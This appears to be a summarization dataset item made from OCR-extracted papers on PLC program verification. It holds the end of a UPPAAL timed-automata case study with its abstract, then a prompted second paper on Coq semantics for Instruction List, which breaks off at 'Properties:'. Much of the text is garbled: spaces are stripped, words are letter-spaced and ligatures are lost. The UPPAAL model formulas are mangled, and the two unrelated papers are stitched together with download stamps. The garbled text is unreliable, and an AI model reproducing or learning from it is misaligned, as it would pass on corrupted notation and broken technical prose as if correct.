Ton_in35:=xl, CFT3:=x2&&evt1_activ, CFT4:=x3&&evt1_activ, Ton_in33:=x4, CFT6:=x4&&jackdown, Ton_in38x5, Ton_in37!jackdown, Ton_in34x7, CFT10:=x7&&optical, CFT11:=x7&&inductive, xO:=1,xl:=0,x2:=0,CFT12:=x8&&right_pos, x3:=0,x4:=0,x5:=0,Ton_in36:=x9, x6:=0,x7:=0,x8:=0,CFT14x9&&inductive, x9:=0,x10:=O,xl1:=0,CFT15:x10&&right_pos, /~xcvcle:=O /\CFT16:=xl11&&riahtDOS.xO:=CFT18II(xO&&CFTO), xl:=CFTOII(xl&&!CFT1&&!CFT2), x2:=CFT1II(x2&&CFT3), x3:=CFT2II(x3&&CFT4), x4:=(CFT311CFT4)11(x4 &&CFT5&&CFT6), x5:=CFT5II(x5&&!CFT7), x6:=CFT6II(x6&&!CFT8), x7:=(CFT711CFT8)11(x7 &&!CFT9&&CFT10&&!CFT11), CFT2:=Ton_Q35 x8:=CFT9II(x8&&!CFT12),CFT5=ToQ33x9:=CFT10II(x9&&CFT13&&CFT14),CFT_x5_&038x10:=CFT13II(xl0&&CFT15),CFT7x5&&on38,xll:=CFT1411CFT11II(xll&&!CFT16),CFT89=x6&&Ton0Q37,x12(CFT12IICFT1SIICFT16)11(x12 &&CFT17), TON!CFT13=TonQ36x13:=CFT17II(x13&&VCFT18)x,)CFT17:=x12&&evac_pinion, computing) inputreading CFT18x13&&left_pos x-cycle<=10 x_cycle<=110 motor:=(xO==111x12==1?0motor), motor:=(xl==1x7==111x13==1?1:motor), right:=(x1==1 ?1:right), x_cycle:=O right:=(x13==1 ?0:ght), downJack:=x4, upjack:=x611x5, present_pinion:=(x2==1 ?1presentpinion), present_pinion:=(x3==1 ?0:presenpinion), pvc_pinion:=(x8==1?:pvc1pinion),Axz!g pvc_pinion:=(x10==1 x11==1?0:pvc1pinion),cooperpinion (xl0==l?1:cooperpinion),downjack==1 cooper_pinion:=(x8==l11xl11==1?0cooper_pinicn), downjack! steel_pinion:=(xl11==1?1:steel_pinion), jack==O steel_pinion:=(x8==l11xl10==1?0steel_pinion), evtl1_activ:=(x4==l?0evtl_activ), present-bearing :=(x5?1:present_bearing), presentbearing (x6?0presentbearing) xcycle>=5 upjack==O motor==1 motor==Oright==1 motor==OIIright==0 pac sop:go_left! o_right! upjack==1 motor==O motor==l&&right ==0motor right outputemission x_cycle<=10 Figure10.UPPAALmodelofmainprogram *theevent-driven taskonlymodifiestheinternalmem- oryoftheoutput, *theevent-driven taskisnotactivated. 6Verification withUPPAAL Theobserverautomaton. Inordertoverifythetimed propertyP2,weneedanadditionalautomaton(seebe- low),whichplaystheroleofanexternalobserverwith respecttothemodelpreviouslydescribed. obs i2==111i3==1t X:=O /\stop? postest? idle top X:=O Thisautomatoncontains astatestop,reachedwhenthe conveyorstopsintestingposition.Italsocontains aclock Xtomeasurethereactiontime.Theobserverautoma- tonstartsfromstateidlewithXsetto0.Whenthemes- sagepostest?isreceivedfromtheconveyor,theautoma- tonmovestostateobsandresetstheclockX.Fromthis pointon,theclockvalueagainincreaseswithtime.When themessagestop?isreceivedfromthemainprogram,the automatonswitchestostatestop.Thus,thevalueofXin thislaststatecorresponds tothetimeelapsedbetweenthe triggeringoftheevent-driven taskandthephysicalstopof theconveyor.TocheckthetimedpropertyP2,weexpressitsnegation(C1inthetablebelow):theobserverautoma- tonwilleventuallyreachthestatestopwiththevalueof theclockXgreaterthan5timeunits.Thispropertyis writtenas E<>(obs.stopandX>5) inUPPAALsyntax,whichisafragmentofthelogic TCTL[1].Inthisformula,thecombination E<>means "forsomepathinthefuture"andobs.stopdenotesloca- tionstopoftheobserverautomaton. Experiments. Firstnotethattheglobalmodelhasabout 30.106configurations, whichareexploredinanonthe flycomputation ofthesetofreachablestates.Thetable belowgivesthetimeandmemoryusedforverification(on alinuxmachinewithapentium4at2.4GHzwith3Go RAM).Theresultsprovideacomparison ofthereaction timesbetweenmonotaskandmultitaskprogramming. Indeed,ononehand,propertiesC5,C6andC7showthat theconveyorstopsbetween10and20timeunitsafterit reachesthetestposition.Thisisfarfrombeingasurprise becausethesevaluescorrespondrespectively tooneand twoPLCcycletimes.Ontheotherhand,propertyC3 showsthattheconveyorstopsinlessthanonePLCcycle time.So,multitaskprogramming reducesthereaction time.However,propertyCIprovesthatitisnotsufficient tosatisfytherequirement P2. Notethat,after29hoursofcomputation, westoppedthe verification processinthecaseofMader-Wupper model. VOLUME2idleI downj< 353 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:44:40 UTC from IEEE Xplore. Restrictions apply. Theseperformances areduetotwomainreasons:the atomicityhypothesisforexecutionsbetween somestates ofthemainprogramandtheenhancedmodeloftheTON block. *Theatomicityhypothesis: weassumethateachone ofthefourstepsofthemainprogram(section5.2) executesinstantaneously. Recallthattimecanelapse onlyinthreestates. *TheenhancedmodeloftheTONblock:weuseone broadcastchanneltosynchronize alltheTONblocks andthemainprograminsteadofthreeordinarychan- nelsforeachTONblockasinMader-Wupper model. 7Conclusion Inthiswork,wegiveformalsemanticsto(partial)Lad- derdiagramsandTONblocks,withtimedautomata.We alsodescribetheoperativepartofstation2ofMSSplat- formwithtimedautomata.Onthisnetworkoftimedau- tomatarepresented inUPPAALsyntax,weformallyprove bymodel-checking thatmultitaskprogramming reduces thereactiontimeoftheconveyor, uponemissionofan outputordertostop.Whilethisdoesnotreallycomeas asurprise, weobtainreasonableverification times(less than30s)onaglobalmodelwithabout30.106states,by addinganatomicityhypothesis toMader-Wupper model andmodifyingtheautomatafortimerblocks.Incompar- ison,model-checking thesameformulawiththeoriginal modelhadtobestoppedafterseveralhours.
Summary:
Sinceitisanimportantissueforusersandsystem designers,verificationofPLCprogramshasalreadybeen studiedinvariouscontexts,mostlyforuntimedprograms. Morerecently,timedfeatureswereintroducedandmod- eledwithtimedautomata.Inthiscasestudy,weconsider apartoftheso-calledMSS(MecatronicStandardSys- tem)platformfromBoshGroup,aframeworkwheretime aspectsarecombinedwithmultitaskprogramming. Our modelforstation2oftheMSSplatformisanetworkof timedautomata,includingautomatafor theoperativepart andforthecontrolprogram,writteninLadderDiagram. Thismodelisconstrained withatomicityhypotheses concerningprogramexecutionandmodelcheckingofa reactiontimepropertyisperformedwiththetoolUPPAAL.
|
Summarize:
I. Introduction Programmable Logical Controllers (PLC) are micro-processor based control systems. They are used in a wide range of industrial applications, from automotive industry and chemical plants to home appliances. PLC applications are critical in a safety or economical cost sense. The recent events of the recall of a large amount of cars for some safety problems caused by a programming bug, are just a new example of a how the cost of such errors can easily get out of proportion. This is more relevant for PLC programs because they are generally used to perform repetitive actions. Thus the use of formal methods and specially theorem proving in the PLC programs development process, will increase the con dence in such programs. Instruction list (IL) is one of the ve programing languages de ned in the IEC 61131-3 standard [1]. With the graphical language ladder diagrams (LD), they are the most widely used languages for pro- graming PLC. The de nition of a formal semantics of IL is a prerequisite for the development of a generic tool for verifying PLC programs written in IL. Since most of PLC compilers use IL as an This research work is funded by the ANR grant ANR-08- BLAN-0326-01 for the SIVES project.intermediate language in the compilation process to machine code, a formal semantics of IL is also nec- essary for the development of a certi ed compiler f o rP L C .T h i sw o r ki st h e r s ts t e pt o w a r d st h e development of a certi ed compiler for PLC pro- grams. It also provides a basis for the development of a static analyzer for PLC programs. There are many examples of the use of formal methods for the veri cation of PLC programs [2], [3], [4]. Most of these examples use model checking. In some of these works, an operational seman- tics of PLC programs is de ned. We extend the operational semantics de ned in [5] to support a larger subset of IL instructions (timers...) and the cyclic behavior of PLC programs. We formalized t h i ss e m a n t i c si nt h ep r o o fa s s i s t a n t Coq [6] using its extension SSRe ect [7]. In this paper, we give in the rst section a brief presentation of PLC systems. In the second section we present a small step operational semantics of the IL language. The formalization of this semantics in the proof assistant Coq and an example are d e s c r i b e di nt h et h i r ds e c t i o n .R e l a t e dw o r k sa n d conclusions are presented in the two nal sections. II. Programmable Logic Controller A PLC is composed of a microprocessor, a mem- ory, input and output devices where signals can be received from sensors or switches and sent to actuators. A main characteristic of PLC is there execution mode. A PLC program is executed in a permanent loop. In each iteration of the execution loop, or scan cycle , the inputs are read, the pro- gram instructions are executed and the outputs are updated. Figure 1 shows the sequencing of the 3 phases of the scan cycle . The cycle time is often xed or has an upper bound limit. It depends on the manufacturer and type of the PLC. 2011 35th IEEE Annual Computer Software and Applications Conference 0730-3157/11 $26.00 2011 IEEE DOI 10.1109/COMPSAC.2011.23126 2011 35th IEEE Annual Computer Software and Applications Conference 0730-3157/11 $26.00 2011 IEEE DOI 10.1109/COMPSAC.2011.23127 2011 35th IEEE Annual Computer Software and Applications Conference 0730-3157/11 $26.00 2011 IEEE DOI 10.1109/COMPSAC.2011.23118 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply. Inputs scan instructions execution Outputs scan Figure 1. Schema of PLC scan cycle A. Programing languages Since the introduction of PLC in the industry, each manufacturer has developed its own PLC programming languages. In 1993, the International Electrotechnical Committee (IEC) published the IEC 1131 International Standard for PLC. The third volume of this standard de nes the program- ming languages for PLC. It de nes 4 languages : Ladder Diagrams (LD) : graphical language that represent PLC programs as relay logic diagrams. Functional Block Diagrams (FBD) : graphical language that represent PLC programs as con- nection of di erent function blocks. Instruction List (IL) : an assembly like lan- guage. Structured Text (ST) : a textual (PASCAL like) programing language. The standard de nes also a meta language called Sequential Function Charts (SFC). It corresponds to a graphical method for structuring programs and allows to describe the system as a state transition diagram. Each state is associated to some actions. An action is described using one of the PLC pro- graming languages like LD or IL. SFC are well suited to write concurrent control programs. We present later in more details the IL language, the main focus of this work. B. Timers In the context of PLC applications, there is often the need to control time. For example, a motor might need to be activated or switched o for a particular time interval. Another example, in a chemicalplantavalveisopenandatankwillbefullafter a period of time. PLC timers are components that set on a boolean output after or for a period of time following the activation of a boolean input. They are used to control output signal duration or as input signal for time dependents PLC programs. In general, they have two inputs and two outputs. Txx TIME PTBOOL IN ETTIMEQBOOL Figure 2. Standard timer representation Figure 2 shows the IEC 61131-3 standard graphical representation of timers. In this representation, IN andQarerespectivelythebooleaninputandoutput of the timer. PTis the constant input used to specify the time delay of the timer. ETis the output indicating the elapsed time since the activation of the timer. The delay PTand elapsed time ETare multiples of a system prede ned time base. IN Q (a)on-delay timerIN Q (b)o -delay timer IN Q (c)pulse timer Figure 3. Types of timers T h e r ei st h r e eb a s i ct y p e so ft i m e r st h a tc a nb e found with PLC. The IEC 61131-3 standard de nes the : on-delay timers (TON) : they come on after a time delay following the activation of the input (Figure 3(a)). o -delay timers (TOF) : they stay on for a xed period of time after the input goes o (Figure 3(b)). pulse timers (TP) : they turn on for a xed period of time after the input goes on (Fig- ure 3(c)). 127 128 119 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply. III.Instruction List language A. General structure The IEC 61131-3 standard de nes an Instruction Listprogram as a list of variables (input, output and local) declarations followed by a list of instruc- tions. An instruction contains an operator followed by a list of operands . Most of IL instructions take one operand, but some like timers instructions need more than one operand. A labelfollowed by a c o l o n( : )c a nb ei n s e r t e db e f o r ea ni n s t r u c t i o n .A n example of IL program is the following: LABEL OPERATOR OPERAND l1: LD x ADD 3 JMP l1 The meaning of some IL operators can be changed using modi ers. In particular, the standard de nes the two modi ers: Cand N.T h e Cmodi er indi- cates that the corresponding instruction should be executed only if the current evaluated result is the boolean value true. It can be used with branch- ing instruction or functions call. The Nmodi er indicates that the operand of the corresponding instructionshouldbenegated.Ifitiscom binedwith theCmodi er, it means that the corresponding i n s t r u c t i o ns h o u l db ee x e c u t e do n l yi ft h ec u r r e n t evaluated result is the boolean value false.I tc a n be used with branching instruction, functions call or booleans operators. For example, the instruction JMPCN l1 will be executed only if the current eval- uation is false. B. Model choices The IEC 61131-3 standard was published after many PLC manufacturers have de ned and imple- mented their own programming languages. It does not give a clear description of the semantics of PLC languages. It does not also specify how PLC timers shouldbehave.WesawpreviouslythataPLCtimer have two outputs : the boolean output and the elapsed time since the timer activation output. How this output are updated is not described by the standard. In practice, PLC manufacturers de nes t w ot y p e so ft i m e r sa c c o r d i n gt ot h ew a yt h e i r outputs are updated. In the rst category, outputs can be updated only if the timer instruction isexecuted. For this kind of timers, a time error is introduced depending on the timer delay variable and the program cycle duration. In the second category, timer outputs are automatically updated by a system routine. In this case a time error is introduced depending on the position of the timer instruction in the program. The execution of the timer instruction is only required to check the state of the outputs. Both timers are not ideal timers and the time error should be taken into account by the PLC programmer when de ning the timers delay input. Our IL model is a signi cant subset of the lan- guage de ned by the IEC 61131-3 standard. This subset covers assignments instructions and boolean and integer operations. It covers also comparison andbranchinginstructionsand on-delaytimers .W e choose to consider only booleans and integers as basic data types. In most of PLC systems, reals are available as basic data types. But in practice, real numbers computation cost much time and they are often delegated to a PC that can communicate with the PLC. This is motivated by the need to keep the program scan cycle within a relatively small time upper bound. In this work we will consider only TON timers. The other two kinds of timers can be treated similarly. We will also suppose that the outputs of the timers are updated only when the timer instruction is executed. This is the case in most of the timers provided by PLC manufacturers. We will also suppose that in an IL program, a timer instruction is called only once with the same output variable. This is needed to keep the time error for the timer less than an cycle duration. T h eI Ls u b s e tw ew o r kw i t hd o e sn o ti n c l u d e function call or counters instructions. In our model, we also choose to work with simple IL operators. In particular, the IL language support binary opera- tors that use a stack for the operation execution. T h eI Ls u b s e tw ed e a lw i t hd o e sn o ti n c l u d e st h i s operators.Anextensionofoursemanticstosupport these operators and the function call should not be di cult. C. Syntax EachILprogramstartwithvariabledeclarations. We will denote the type of IL variables by Var. These declarations specify for each variable if it is 128 129 120 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply. an input ( Varin) or/and output ( Varout)o ral o c a l variable ( Varloc). In addition to standard variables, IL have a speci c register where every computation takes place. This special register will be denoted reg. P::={varin;list input variables varout;list output variables varloc;list local variables body;}list of instructions After the variable declarations, the IL program body follows with a list of instructions. As we mentioned before, an IL instruction is composed of an operator and one or more operands. An operand can be a variable or a constant. Instructions: i::= LDop load |STid store |SRid|RSid set and reset |JMPlbl|JMPClbljumps |JMPCN lbl |ADDop|SUBop integers |MULop |ANDop|ORop booleans |ANDN op|ORNop |NOTop |EQop|GEop comparison |GTop |TONid , n On delay timer |RET end of program Operands: op::=id|cstvariable identi er or constant Constants: cst::=n|binteger or boolean literal We will denote the set of IL instructions by Instr. For simplicity, we suppose that IL program labels are natural numbers. Since an IL program is a list of instruction, a label will indicate the position of thecorrespondinginstructioninthelist.Foragiven program Pand an index i,P(i) Instrrepresent the instruction of Pat the position i. D. Operational semantics We de ned a small step operational semantics of IL programs. This semantics extend the one de ned in [5] to support on-delay timers and the cyclic behavior of PLC programs.Modes:as we mentioned in Section II, each IL program scan cycle contains 3 phases: I: input, O: output, E: instruction execution. The set of these execution phases will be denoted modes. Cycles: we suppose having a global discrete time clock. Each program execution cycle is rep- resented by an identi er or its index in the time execution line. Every cycle is associated to its beginning time according to the global clock. The set of program execution cycles is denoted C N. For a cycle c, the starting time is denoted tcand t h ed u r a t i o no fe v e r yc y c l ei s x e da n dc o r r e s p o n d to a global system constant =tc+1 tc. States:a state is a function that associates to each variable of the program and the register a value. The set of state corresponds to: S={reg} Var D, whereDis the union of the IL variables data domains. Con gurations: elements of the set E=C S N mode. A con guration (c, ,i,m)corresponds to a cycle identi er c, a state , a position index i and an execution mode m. Transitions: relationoncon gurations E E. F i g u r e4g i v e st h ei n f e r e n c er u l e so ft h eI Lc o n g u - rations transitions relation. The transition system is de ned by an initial con guration (0, 0,0,I), where 0istheinitialstatethatmapsallthein teger variables to 0and boolean variables to false. The rst two transitions rules of Figure 4 cor- respond to the loadandstoreinstructions. In the rst case the register is updated while in the second the variable state is updated. The transitions cor- responding to the set/reset instructions (rules SR andRS) update the variable state function with the corresponding values for the given operands. In the inference rule JMP, transition for the uncondi- tional branching instruction, there is no condition on the branching label value (position of the jump- ing target) compared to the current position of the program counter. This can lead to non terminating ILprograms.Inpracticethisshouldnotbethecase, since every IL program should terminate during the 129 130 121 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply. LDP(i)=LD op /prime= [reg/mapsto op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)P(i)=STx /prime= [x/mapsto reg] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)ST SRP(i)=SR x /prime= [x/mapsto x reg] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)P(i)=RS x /prime= [x/mapsto x reg] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)RS JMPC-trueP(i)=JMPC lbl (reg)=T P/turnstileleft(c, ,i,E ) (c, ,lbl,E )P(i)=JMPC lbl (reg)=F P/turnstileleft(c, ,i,E ) (c, ,i +1,E)JMPC-false JMPCN-falseP(i)=JMPCN lbl (reg)=F P/turnstileleft(c, ,i,E ) (c, ,lbl,E )P(i)=JMPCN lbl (reg)=T P/turnstileleft(c, ,i,E ) (c, ,i +1,E)JMPCN-true JMPP(i)=JMP lbl P/turnstileleft(c, ,i,E ) (c, ,lbl,E )P(i)=ADD op /prime= [reg/mapsto reg+op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)ADD SUBP(i)=SUB op /prime= [reg/mapsto reg op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)P(i)=MUL op /prime= [reg/mapsto reg op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)MUL ANDP(i)=AND op /prime= [reg/mapsto reg op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)P(i)=OR op /prime= [reg/mapsto reg op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)OR ANDNP(i)=ANDN op /prime= [reg/mapsto reg op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)P(i)=ORN op /prime= [reg/mapsto reg op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)ORN NOTP(i)=NOT op /prime= [reg/mapsto op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)P(i)=EQ op /prime= [reg/mapsto reg==op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)EQ GEP(i)=GE op /prime= [reg/mapsto reg op] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)P(i)=GT op /prime= [reg/mapsto reg < op ] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)GT P(i)=TONTx,Pt (reg)=F /prime= [Tx.Q/mapsto F,Tx.ET /mapsto 0] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)TON-off P(i)=TONTx,Pt (reg)=TTx.ET < Pt /prime= [Tx.Q/mapsto F,Tx.ET /mapsto Tx.ET + ] P/turnstileleft(c, ,i,E ) (c, /prime,i+1,E)TON-on P(i)=TONTx,Pt (reg)=TTx.ET > =Pt /prime= [Tx.Q/mapsto T,Tx.ET /mapsto Tx.ET + ] (c, ,i,E ) (c, /prime,i+1,E)TON-end P(i)=RET P/turnstileleft(c, ,i,E ) (c, , 0,O)RET x:Var in /prime= [xi/mapsto vi] P/turnstileleft(c, ,i,I ) (c, /prime,i,E )InputP/turnstileleft(c, ,i,O ) (c+1, ,i,I )Output Figure 4. IL Operational semantics scan cycle time limit. We chose here not to consider this kind of errors. They can be treated at the level of the syntactic analysis or by static analysis of the program. ThetransitionrelationfortheTONinstructionis given by the rules TON-off ,TON-on andTON- endof Figure 4. The elapsed time variable ET of the TON timer is incremented by the global constant when the timer is activated (the eval- uation register value is true). The timer output Qis activated when the elapsed time variable ET is greater or equal to the timer delay parameter PT. For the inputtransition, the variables state function is updated by the input variables values given by the program global environment. The output transition corresponds to the cycle identi er incrementation and the change of the con gurationmode. The program environment will have to read t h ev a r i a b l e ss t a t ed u r i n gt h i st r a n s i t i o nt og e tt h e values of the outputs of the system. After this de nition of the semantics of the IL language, we present in the next section our for- malization of this semantics in the proof assistant Coq. IV. Coq formalizations As we mentioned before, we intend to develop a certi ed compiler from IL to the C language. We choose to formalize the IL semantics in the Coq proof assistant to make it easier to connect our de- velopment to the already existing certi ed compiler for C : the CompCert [8] compiler. We also want to produce from this formal development a certi ed executable. The Coq extraction mechanisms will allow us to produce such executable. 130 131 122 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply. In the reasoning about IL programs, we will have to deal with proprieties about booleans and naturals numbers. In this development, we chose to use the Coq extension SSRe ect for its rich libraries on booleans and natural numbers. We also use SSRe ect generic library for lists and its interface for types with decidable equality. More details about this libraries can be found in the SSRe ect manual [7] and tutorial [9]. A. Syntax TheCoq system provides a very powerful mech- anism to de ne recursive or nite type or set. This mechanism is called inductive type and is very useful when de ning the syntax of a programming language. We de ne the IL syntax presented in Section III-C, using the Coq inductive type mech- anism. The de nitions are given in Figure 5. In these de nitions, the types timeand identare a renaming of the Coq standard type nat.T h e r s t one corresponds to the type of variable identi ers. Sinceweconsiderdiscretetime,thetype timeisthe type of time values. A piece of IL code corresponds toalistofinstruction.Werepresentitasanelement of the type code := seq Instr1. Inductive ILcst : Type := | Ncst (n : nat) | Bcst (b : bool) | Tcst (t : time). Inductive Operands : Type := | var (id : ident) | cst (c : ILcst). Inductive Instr : Type := | LD (op : Operands) | ST (x : ident) | SR (x : ident) | RS (x : ident) | JMP (l : nat) | JMPC (l : nat) | JMPCN (l : nat) | ADD (op : Operands) | SUB (op : Operands) | MUL (op : Operands) | AND (op : Operands) | OR (op : Operands) | ANDN (op : Operands) | ORN (op : Operands) | NOT (op : Operands) | EQ (op : Operands) | GT (op : Operands) | GE (op : Operands) | TON (q et : ident) (pt : time) | RET. Figure 5. Coq de nition of the IL syntax B. Semantics Our formalization of the IL semantics de ned in Section III-D is parameterized by the following Coq global variables: 1seqi st h et y p eo fl i s ti n SSRe ect.Variables (delta:time)(pi:seq ident ). Variables (p_ival:nat ident nat)(P:code). The variable deltarepresents the cycle duration time. The list of program input variables is rep- resented by pi. In order to de ne the semantics transitions, we need to know the input variables in order to update them with the values given by the program environment at the beginning of each cycle. Those values are represented by the function p_ivalthat takes as parameters a cycle identi er and a variable identi er and returns a value. When we look at the de nition of the transition relation for the IL semantics given in Figure 4, we notice that it can be decomposed into two sub-operations. First, there is the states updating function. It returns a new state according to the evaluated program instruction. Second, there is the program location successor. Normally it returns the incremented value of the current location, unless the instruction is a branching. The con guration transitionfunctioncanbede nedontopofthesub- operations just by checking the execution mode. States:For the de nition of the variable states a n ds i n c eb o o l e a n sc a nb ei n j e c t e di ni n t e g e r s2,w e chooseto representthenaturalnumbersasthedata domain of the IL variables. We de ne a state as an object of the type State. Definition State:=nat (ident nat). Definition state_u psiv:State:= ifiis(Sn)then (s.1,funx=>ifn==xthen velse s.2x) else(v,s.2). A program state s : State is a pair. The rst element of the pair, denoted s.1,r e p r e s e n t st h e value of the current register. The second element of the pair, denoted s.2, represents the function that maps every program variable to its value. We de ne also some state transformation function. The function state_up updatesthevalueofastate sfor a given variable determined by its second argument iwith a value v.I fiis equal to zero the current register value is updated otherwise the variables mapping function is updated. Instruction evaluation: The de nition of the IL instruction evaluation function is presented in Fig- 2This can be automatically done in Coq using coercions. 131 132 123 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply. Definition eval_instr (s : State) (i : Instr) : State := match iwith | LD op => state_up s 0 (s op) | ST x => state_up s x.+1 s.1 | SR x => state_up s x.+1 (BofN s.1 || BofN (s.2 x)) | RS x => state_up s x.+1 (~~ BofN s.1 && BofN (s.2 x)) | AND op => state_up s 0 (BofN s.1 && BofN (s op)) | OR op => state_up s 0 (BofN s.1 || BofN (s op)) | NOT op => state_up s 0 (~~ BofN (s op)) | ANDN op => state_up s 0 (BofN s.1 && ~~ BofN (s op)) | ORN op => state_up s 0 (BofN s.1 || ~~ BofN (s op)) | ADD op => state_up s 0 (s.1 + s op) | MUL op => state_up s 0 (s.1 * s op) | SUB op => state_up s 0 (s.1 - s op) | GT op => state_up s 0 (s.1 < s op) | GE op => state_up s 0 (s.1 <= s op) | EQ op => state_up s 0 (s.1 == s op) |T O Nqe tp t= > ifBofN s.1 then let s := state_up s et.+1 (s.2 et + d) in ifs.2 et < pt then state_up s q.+1 0 else state_up s q.+1 1 else let:s : =s t a t e _ u pse t . + 10 instate_up s q.+1 0 |_= >s end. Figure 6. IL instructions evaluation function ure 6. It follows the inference rules given in Fig- ure 4. The function eval_instr takes two argu- ments, a state and an instruction, and returns a new state. For example, the evaluation of a load instruction will return an updated state where the current register is equal to the value of the instruc- tion operands. Another example is given by the set instruction SR x. For this case, the variable xis updated with the disjunction of its previous value and the value of the current register. For the opera- tors that are de ned only for booleans values (like: SR,AND...), we use the function BofNthat return the original boolean value of a boolean variable that was translated to a natural numbers. In the de nition of Figure 6 and the following de nitions, we use an SSRe ect notation for a natural number successor. When we write x.+1this correspond to the successor of xorx+1. Con gurations transition: the IL con gurations, presented in Section III-D, are encoded as a Coq product type. Inductive ILmode:=I|O|E. Definition ILConf:=nat State nat ILmode. In a con guration, cycle identi er and location are represented by naturals numbers. The execution mode is represented by an element of the inductiveDefinition instr_succ (i : Instr) x (s : State) : nat := match iwith |J M Pl= >l | JMPC l => ifBofN s.1 then lelse x.+1 | JMPCN l => if~~ BofN s.1 then lelse x.+1 | _ => x.+1 end. Definition transition (Cf : ILConf) := match Cfwith ( c ,s ,l ,m )= > match mwith |I= > let s := state_up_seq s pi (p_ival c) in (c, s , l, E) | O => (c.+1, s, l, I) |E= > let I := nth RET P l in ifI == RET then ( c ,s ,0 ,O ) else (c, eval_instr s I, instr_succ I l s, E) end end. Figure 7. IL Con gurations transition function type ILmode. The elements of this nite type cor- responds to the three modes we de ned previously in Section III-D. Since our IL semantics is deterministic, we de ne the con gurations transition relation as a function. TheCoq de nition is given in Figure 7. The transi- tionfunctionproceedsbylookingatthemodeofthe con guration passed as argument. If it is an input mode,thevariablesstatefunctionisupdatedbythe new values of the input variables and the mode is changed to execution . The function state_up_seq is a generalization of the state updating function state_up that updates a list of variables. When the originalcon gurationhasan outputmode,thecycle identi er is incremented and the mode is changed toinput. This two cases correspond to the inference rules InputandOutput of Figure 4. When the con guration mode is execution ,t h e transition function will rst check the instruction corresponding to the current con guration. This instruction corresponds to the lthelement of the list of instructions of the code P.W eu s eh e r et h e generic function nthfrom SSRe ect seqlibrary. If the element at the position lofPis equal to RET thentherule RETofFigure4isapplied.Otherwise thecycleand the modewill not be modi ed. The variable state will be updated using the function eval_instr . The con guration location is updated usingthefunction instr_succ thatreturnsthesuc- cessor of a location according to the corresponding instruction and the state of the current register. 132 133 124 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:16 UTC from IEEE Xplore. Restrictions apply. Program executions: After the de nition of the IL con guration transition function, we de ne a program execution as the transitive closure of the transition relation. Since it is not always possible to know how many transition are needed to execute an IL program, we de ne the program execution as a propositional relation rather than a compu- tational function. The de nition of execis given Inductive exec (c1 c2 : ILConf) : Prop := | exec_step : transition c1 = c2 exec c1 c2 | exec_star cf : transition c1 = cf exec cf c2 exec c1 c2. Lemma exec_splitI_prodl : forall cns 0s , exec (c, s0, 0, I) (c + n.+1, s, 0, O) exists r, exec (c, s0, 0, I) (c, r, 0, O) exec (c.+1, r, 0, I) (c + n.+1, s, 0, O). Lemma exec_splitI_prodr : forall cns 0s , exec (c, s0, 0, I) (c + n.+1, s, 0, O) exists r, exec (c, s0, 0, I) (c + n.+1, r, 0, I) e x e c( c+n . + 1 ,r ,0 ,I )( c+n . + 1 ,s ,0 ,O ) . Figure 8. IL program execution de nition and lemmas in the Figure 8. It corresponds to the standard transitive closure predicate. In addition to this de - nition, we prove some generic properties about any program executions. The rst lemma of Figure 8 states that if the execution of a program starting from the con gurations (c, s0, 0, I) ends at the con guration (c + n.+1, s, 0, O) ,i tm u s tc o m e through a con guration where the cycle is the rst execution cycle and the mode is output. The second lemma states the same property but for the last execution cycle. The proofs of this two lemmas are straightforward. They use induction and the property of monotonicity of the execrelation for cycles. Using our IL semantics, we formalized a simple example of PLC program and proved some prop- erties about it. This is presented in the following sub-section. C. Example We formalized a simple example of PLC pro- gram written in the IL language. It is one of the examples given in the book Programmable Logic Controller s [10]. Description: We consider the example of a PLC program for opening and closing a car park en-trance barrier. The barrier is opened when the cor- rect amount of money is inserted in the collection box. The barrier will stay open for 10 seconds. The program has three inputs and two outputs. The rst input is associated to a sensor in the collection box. When the barrier is down it trips a switch and when up it trips another switch. These switches are associated to the two others input variables of the program. They give the position of the barrier to the program. The opening and closing of the barrier is managed by a valve-piston system. The two program outputs are associated to the two valves of this system. The program source Inputs: X400 (I0) X401 (I1) X402 (I2) Outputs: X430 (Q0) X431 (Q1)LD X400 OR Y430 ANI M100 ANI Y431 OUT Y430 LD X401 OUT T450 K1 0 LD T450 OUT M100 LD M100 OR Y431 ANI X402 ANI Y430 OUT Y431 ENDDefinition P1 := [:: LD I0; OR Q0; ANDN T0; ANDN Q1; ST Q0; LD I1; TON T0 ET0 PT; LD T0; OR Q1; ANDN I2; ANDN Q0; ST Q1; RET ]. Figure 9. Car barrier program in Mitsubishi format and in Coq in theMitsubishi format, which does not follow the standard, and the corresponding Coq de nition are presented in Figure 9. The output Q0for raising the entrance barrier is activated when the input I0 is activated. It remains on until the timer output variable T0is activated. This happens when the input I1, indicating that the barrier is up, remains on for 10 seconds. At the end of the time delay the output Q1is activated telling the valve-piston system to lower the barrier. In a normal state, the input variables I1and I2should have opposite boolean values. When they have the same values, it means the barrier is in the process of being lowered or raised. Properties: 